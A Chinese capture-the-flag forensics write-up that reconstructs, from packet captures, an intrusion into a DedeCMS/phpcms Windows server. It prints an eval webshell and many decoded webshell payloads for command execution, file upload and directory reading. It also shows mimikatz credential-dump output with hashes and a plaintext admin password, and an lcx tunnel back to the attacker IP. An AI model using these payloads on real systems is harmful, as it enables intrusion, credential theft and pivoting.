[信息安全鐵人三項(xiàng)賽總決賽](數(shù)據(jù)賽)第四題

WriteUps

信息安全鐵人三項(xiàng)賽總決賽總結(jié)(企業(yè)賽)
信息安全鐵人三項(xiàng)賽總決賽(數(shù)據(jù)賽)第二題
 信息安全鐵人三項(xiàng)賽總決賽(數(shù)據(jù)賽)第三題
 信息安全鐵人三項(xiàng)賽總決賽(數(shù)據(jù)賽)第四題

所有題目 : https://github.com/WangYihang/t3sec-network-flow-analysis/blob/master/2016-2017/%E5%86%B3%E8%B5%9B/N-EM-00004.md

image.png

有人在進(jìn)行目錄掃描
基本上可以確定 , 一個潛在的攻擊者 , 以及被攻擊者

攻擊者 : 172.16.10.110
被攻擊者 : 192.168.20.117

首先過濾出這兩者之間的所有數(shù)據(jù)包

PS :
感覺還是在發(fā)現(xiàn)攻擊者和被攻擊者之后直接提取出他們之間的所有數(shù)據(jù)包比較靠譜
#!/bin/bash
#attack_dump.sh

target_folder='attack'

mkdir ${target_folder}

for file in `ls *.pcap`;
do
   echo "Dumping attack package in ${file}..."
   tcpdump -A -s 0 'host 172.16.10.110 or host 192.168.20.117' -r $file -w ${target_folder}/${file}
   echo "${file} Done!"
done

同時(shí)也生成了 http 的數(shù)據(jù)包
還是感覺直接搜索 http 的文本來的比較快

首先直接 grep 看看有沒有小馬什么的

888849-Connection: Keep-Alive
888850-Content-Type: text/plain
888851-
888852:<?php @eval($_POST['t'])?>
888853-17:54:03.133536 IP 172.16.10.110.8888 > 192.168.20.117.1409: Flags [P.], seq 1927878527:1927879124, ack 2736838709, win 64240, length 597
888854-E..}.k@...St..
888855-n...u"...r.... .5P.......POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1

不過居然是個文本文件 ?

image.png

再往上下翻翻居然發(fā)現(xiàn)了一個小馬

image.png

這里的小馬好像有一些特征 :
比如說 :

User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
array_map

根據(jù)這個特性進(jìn)行搜索

grep -n -C 5 'spider.html' http.txt | grep 'POST '

果然發(fā)現(xiàn)了兩個小馬 :

/9.php
/uploadfile/2017/0905/20170905055411283.php

image.png

猜想這兩個小馬可能是通過漏洞寫入的
直接搜索 9.php 最開始出現(xiàn)的地方

image.png

搜索一下 /admin/file_manage_control.php
發(fā)現(xiàn)是織夢CMS
利用的漏洞應(yīng)該是 :

http://www.cnblogs.com/LittleHann/p/4237578.html

可以看到首先攻擊者利用了上述漏洞 9.php 寫入服務(wù)器

image.png

而搜索另一個小馬的時(shí)候卻發(fā)現(xiàn)是直接就進(jìn)行了利用
而且文件名是以時(shí)間的形式命名
猜想是利用了文件上傳漏洞將文件上傳到服務(wù)器的

根據(jù)數(shù)據(jù)包詳情 , 找到了如下一篇文章 :

http://0day5.com/archives/4368/ (phpcms v9 前臺 GetShell)
這個漏洞在利用的過程中用到了 1.txt

繼續(xù)向前回溯

找到攻擊者是通過 9.php 寫入了 1.txt 這個文件

image.png

繼續(xù)向前分析 , 攻擊者在觸發(fā) DedeCMS 寫入 9.php 的時(shí)候需要得到管理員的密碼
那么在這之前肯定對密碼進(jìn)行了爆破

grep -n 'POST ' http.txt | awk -F 'POST ' '{print $2}' | awk -F 'HTTP/1.1' '{print $1}' | sort | uniq -c

image.png

經(jīng)過尋找發(fā)現(xiàn) , 攻擊者幾乎是已經(jīng)知道了登錄后臺的密碼 , 并沒有經(jīng)過爆破 , 而是直接登錄

image.png

gotopage=%2Fadmin%2F&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=%B5%C7%C2%BC
gotopage=/admin/&dopost=login&adminstyle=newdedecms&userid=admin&pwd=19901109&validate=yyer&sm1=

用戶名為 : admin
密碼為 : 19901109

讓攻擊者直接知道密碼就登錄
可能性有很多
有可能是攻擊者直接通過注入得到了管理員密碼
也有可能是通過社工
也可能是敏感信息泄露等等

經(jīng)過研究發(fā)現(xiàn)應(yīng)該不會是明注得到的管理員密碼
因?yàn)樵诹髁堪胁荒軝z索到別的相同的字符串

image.png

嘗試檢測是否存在盲注的情況
...可能因?yàn)槟芰τ邢?, 并沒有分析出來...

接下來可以看看攻擊者都使用兩個小馬做了什么
首先看 9.php

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g'

grep -n -C 32 'POST /9.php' http.txt | grep array_map | sed 's/%3D/\=/g' | sed 's/%2F/\//g' | sed 's/%2B/\+/g' | grep -E 'xx\(.+' -o | sed 's/^xx//g' | tr -d '()";\\\' | tr -d "'"

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 獲取系統(tǒng)版本以及用戶名等信息
C:\phpStudy\WWW  C:  Windows NT WANGGUAN-C938A1 5.2 build 3790 (Windows Server 2003 Enterprise x64 Edition Service Pack 2) i586(Administrator)

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件
./   2017-09-05 17:34:52 0   0777
../ 2017-08-29 11:16:35 0   0777
a/  2017-09-05 16:05:51 0   0777
admin/  2017-09-05 16:05:51 0   0777
data/   2017-09-05 16:18:01 0   0777
images/ 2017-09-05 16:03:30 0   0777
include/    2017-09-05 16:03:21 0   0777
install/    2017-09-05 16:06:08 0   0777
member/ 2017-09-05 16:03:24 0   0777
phpMyAdmin/ 2017-08-29 11:16:15 0   0777
plus/   2017-09-05 16:05:51 0   0777
special/    2017-09-05 16:05:51 0   0777
templets/   2017-09-05 16:03:26 0   0777
uploads/    2017-09-05 16:05:51 0   0777
9.php   2017-09-05 17:34:52 26  0666
favicon.ico 2010-03-11 15:45:00 1150    0666
index.php   2010-02-07 17:05:00 738 0666
robots.txt  2010-02-07 17:05:00 505 0666
tags.php    2010-02-07 17:05:00 633 0666
wap.php 2010-02-07 17:05:00 3938    0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D=dirname(__FILE__);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("X@Y");die();
// 獲取系統(tǒng)版本以及用戶名等信息

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&whoami&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 whoami
wangguan-c938a1\administrator

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&ipconfig&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 ipconfig
Windows IP Configuration.               
.                    
.                    
Ethernet adapter ........:.             
.                    
   Connection-specific DNS Suffix  . : .           
   IP Address. . . . . . . . . . . . : 192.168.20.117.
   Subnet Mask . . . . . . . . . . . : 255.255.255.0.
   Default Gateway . . . . . . . . . : 192.168.20.1.

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&systeminfo&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 systeminfo
......:           WANGGUAN-C938A1
OS ....:          Microsoft(R) Windows(R) Server 2003 Enterprise x64 Edition
OS ....:          5.2.3790 Service Pack 2 Build 3790
OS ......:        Microsoft Corporation
OS ....:          ..........
OS ........:      Uniprocessor Free
............:     wangguan
..........:               
.... ID:          91353-645-7659413-50864
............:     2017-8-29, 10:14:19
............:     0 .. 2 .... 55 .. 11 ..
..........:       VMware, Inc.
........:         VMware Virtual Platform
........:         x64-based PC
......:           ...... 1 ..........
                  [01]: EM64T Family 6 Model 60 Stepping 3 GenuineIntel ~3400 Mhz
BIOS ....:        UNKNOWN 
Windows ....:     C:\WINDOWS
........:         C:\WINDOWS\system32
........:         \Device\HarddiskVolume1
............:     zh-cn;....(....)
..............:   zh-cn;....(....)
....:             (GMT+08:00) ....................................
............:     1,023 MB
..............:   379 MB  
........: ......: 2,299 MB
........: ....:   1,854 MB
........: ......: 445 MB  
............:     C:\pagefile.sys
..:               WORKGROUP
..........:       \\WANGGUAN-C938A1
........:         ...... 1 ............
                  [       
17:35:41.557144 IP 192.168.20.117.http > 172.16.10.110.5299: Flags [P.], seq 2606:2963, ack 4254, win 64240, length 357: HTTP
E...TG@........u..        
n.P......5..QP...."..01]: Q147222
....:             ...... 1 .. NIC..
                  [01]: Intel(R) PRO/1000 MT Network Connection
                      ......:      ........
                      .... DHCP:   ..                                                                                          
                      DHCP ......: 192.168.20.1
                      IP ....
                      [01]: 192.168.20.117
[S]                       

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\mimikatz.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上傳本地文件保存到 C:\\phpStudy\\WWW\\mimikatz.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 : C:\\phpStudy\\WWW\\&mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords"" exit >> C:\\phpStudy\\WWW\\log.txt
// 使用 mimikatz.exe 搜集系統(tǒng)密碼并輸出到 C:\\phpStudy\\WWW\\log.txt 中

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\log.txt";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 讀取文件內(nèi)容 : C:\\phpStudy\\WWW\\log.txt
  .#####.   mimikatz 2.1.1 (x64) built on Apr  9 2017 23:24:20
 .## ^ ##.  "A La Vie, A L'Amour"                   
 ## / \ ##  /* * *                                  
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 21 modules * * */
                                                    
mimikatz(commandline) # privilege::debug            
Privilege '20' OK                                   
                                                    
mimikatz(commandline) # sekurlsa::logonpasswords    
                                                    
Authentication Id : 0 ; 996 (00000000:000003e4)     
Session           : Service from 0                  
User Name         : NETWORK SERVICE                 
Domain            : NT AUTHORITY                    
Logon Server      : (null)                          
Logon Time        : 2017-9-5 14:40:42               
SID               : S-1-5-20                        
    msv :                                           
     [00000002] Primary                             
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * LM       : aad3b435b51404eeaad3b435b51404ee  
     * NTLM     : 31d6cfe0d16ae931b73c59d7e0c089c0       
     * SHA1     : da39a3ee5e6b4b0d3255bfef95601890afd80709
    wdigest :                                       
     * Username : WANGGUAN-C938A1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    kerberos :                                      
     * Username : wangguan-c938a1$                  
     * Domain   : WORKGROUP                         
     * Password : (null)                            
    ssp :                                           
    credman :                                       
                                                    
Authentication Id : 0 ; 216713 (00000000:00034e89)  
Session           : Interactive from 0              
Us                                                                                                                         
17:36:47.042287 IP 192.168.20.117.http > 172.16.10.110.5303: Flags [.], seq 1461:2921, ack 767, win 63473, length 1460: HTTP
E...V.@........u..                                  
n.P...#U....8P....n..er Name         : Administrator                                                                          
Domain            : WANGGUAN-C938A1                 
Logon Server      : WANGGUAN-C938A1                 
Logon Time        : 2017-9-5 14:41:24               
SID               : S-1-5-21-2640452580-1396535521-4086226850-500
    msv :                                           
     [00000002] Primary                             
     * Username : Administrator                     
     * Domain   : WANGGUAN-C938A1
     * LM       : 1160eb40860de5aeb75e0c8d76954a50
     * NTLM     : 74e0fa3bf5a67fd3b43ed8912042fabb       
     * SHA1     : 9d464a83db1089ff0b49c72938d2806953594714
    wdigest :      
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    kerberos :     
     * Username : Administrator
     * Domain   : WANGGUAN-C938A1
     * Password : mtfly@123
    ssp :       
    credman :   
                
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null) 
Logon Time        : 2017-9-5 14:40:42
SID               : S-1-5-19
    msv :       
    wdigest :   
    kerberos :     
     * Username : (null)  
     * Domain   : (null)  
     * Password : (null)  
    ssp :       
    credman :   
                
Authentication Id : 0 ; 52147 (00000000:0000cbb3)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)          
Logon Time        : 2017-9-5 14:40:42
SID               : 
    msv :       
    wdigest :   
    kerberos :  
    ssp :       
    credman :                                                                    
                
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType f


@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\log.txt';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 讀取文件內(nèi)容 : C:\\phpStudy\\WWW\\log.txt

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\DTools.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上傳文件保存至 : C:\\phpStudy\\WWW\\DTools.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\data\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F='C:\\phpStudy\\WWW\\data\\common.inc.php';$P=@fopen($F,'r');echo(@fread($P,filesize($F)));@fclose($P);;echo("X@Y");die();
// 獲取文件內(nèi)容 : C:\\phpStudy\\WWW\\data\\common.inc.php
@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$F="C:\\phpStudy\\WWW\\data\\common.inc.php";$fp=@fopen($F,'r');if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo('ERROR:// Can Not Read');};echo("X@Y");die();
// 獲取文件內(nèi)容 : C:\\phpStudy\\WWW\\data\\common.inc.php
<?php                    
//..............            
$cfg_dbhost = 'localhost';  
$cfg_dbname = 'dedecms';    
$cfg_dbuser = 'root';       
$cfg_dbpwd = 'root';        
$cfg_dbprefix = 'dede_';    
$cfg_db_language = 'gbk';                               
?>

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\phpStudy\\WWW\\data\\22.exe';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上傳文件保存至 : C:\\phpStudy\\WWW\\data\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\WWW\\data\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\WWW\\data\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\phpStudy\\WWW\\data\\22.exe&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 : C:\\phpStudy\\WWW\\22.exe

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan?????????.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上傳文件保存至 : C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\phpStudy\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\phpStudy\\ 目錄下的所有文件

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$f='C:\\Hscan?????????.zip';$c=$_POST["z1"];$c=str_replace("\r","",$c);$c=str_replace("\n","",$c);$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode('%'.substr($c,$i,2));echo(@fwrite(fopen($f,'w'),$buf)?'1':'0');;echo("X@Y");die();
// 上傳文件保存至 : C:\\Hscan***.zip

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$D='C:\\';$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D.'/'.$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."\n";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("X@Y");die();
// 讀取 C:\\ 目錄下的所有文件
Documents and Settings/  2017-08-30 10:26:49 0   0777
phpStudy/   2017-08-29 11:16:35 0   0777
Program Files/  2017-08-29 10:19:09 0   0555
Program Files (x86)/    2017-08-29 10:10:05 0   0555
RECYCLER/   2017-08-29 11:24:41 0   0777
System Volume Information/  2017-08-29 10:15:42 0   0777
WINDOWS/    2017-09-05 17:50:05 0   0777
wmpub/  2017-08-29 10:11:11 0   0777
AUTOEXEC.BAT    2017-08-29 10:10:54 0   0777
boot.ini    2017-08-29 10:06:43 221 0666
bootfont.bin    2007-03-07 20:00:00 322730  0444
CONFIG.SYS  2017-08-29 10:10:54 0   0666
Hscan...........zip 2017-09-05 17:41:19 1170778 0666
IO.SYS  2017-08-29 10:10:54 0   0444
lcx.exe 2017-09-05 17:49:48 8704    0777
MSDOS.SYS   2017-08-29 10:10:54 0   0444
NTDETECT.COM    2007-03-07 20:00:00 47772   0555
ntldr   2007-03-07 20:00:00 306288  0444 
pagefile.sys    2017-09-05 14:40:40 1610612736  0666

@ini_set("display_errors","0");@set_time_limit(0);if(PHP_VERSION<'5.3.0'){@set_magic_quotes_runtime(0);};echo("X@Y");$m=get_magic_quotes_gpc();$p='cmd';$s='cd /d C:\\phpStudy\\WWW\\&C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80&echo [S]&cd&echo [E]';$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";$array=array(array("pipe","r"),array("pipe","w"),array("pipe","w"));$fp=proc_open($r." 2>&1",$array,$pipes);$ret=stream_get_contents($pipes[1]);proc_close($fp);print $ret;;echo("X@Y");die();
// 執(zhí)行系統(tǒng)命令 C:\\lcx.exe -slave 172.16.10.110 8888 192.168.20.88 80

